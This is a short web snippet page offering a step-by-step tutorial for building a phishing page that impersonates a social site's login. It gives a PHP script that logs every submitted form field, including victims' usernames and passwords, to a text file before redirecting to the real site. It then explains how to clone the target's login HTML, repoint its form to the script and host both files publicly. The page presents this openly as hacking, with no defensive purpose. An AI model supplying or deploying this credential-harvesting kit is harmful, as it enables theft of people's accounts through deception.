Php Code Fake Login Page - Php

How to make a Fake login page manually using php?

Snippet Code


  
Rate this page :
  [ 0 votes]

This simple code allows you to create a fake login page manually for any social sites. You need two files for hacking login page such as login.php, index.html. The sample code to create a fake login is given below.

Follow the given steps to create a fake login: Step 1. Creating a login.php file Copy the code given below and paste it in notepad and save it with name login.php <?php header ('Location: http://www.tumbler.com'); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?> Step 2. Create the fake index.html Page: 2.1. Open a site for which you want to make a fake login, Such as orkut.com. And login into that page. Then right click there, save as , then save it. After downloading the file, you will obtain one htm file(tumbler-login.html) with a folder(tumbler-login_files) which contains some images, css files and js files. 2.2. Open the html file in downloaded list using notepad. Use ctrl +F for searching for word action in form tag. 2.3. After your php file created in step:1 replace the url and also clear the line on submit=".." if it exists. Your own fake login page is ready.. Save it with name index.html Step 3: Now upload both the files index.html and login.php in a free hosting site… to know how to upload and all "http://www.techbyte4u.com/2010/07/how-to-hack-any-mail-account-by.html".

Tags


Ask Questions

Ask Question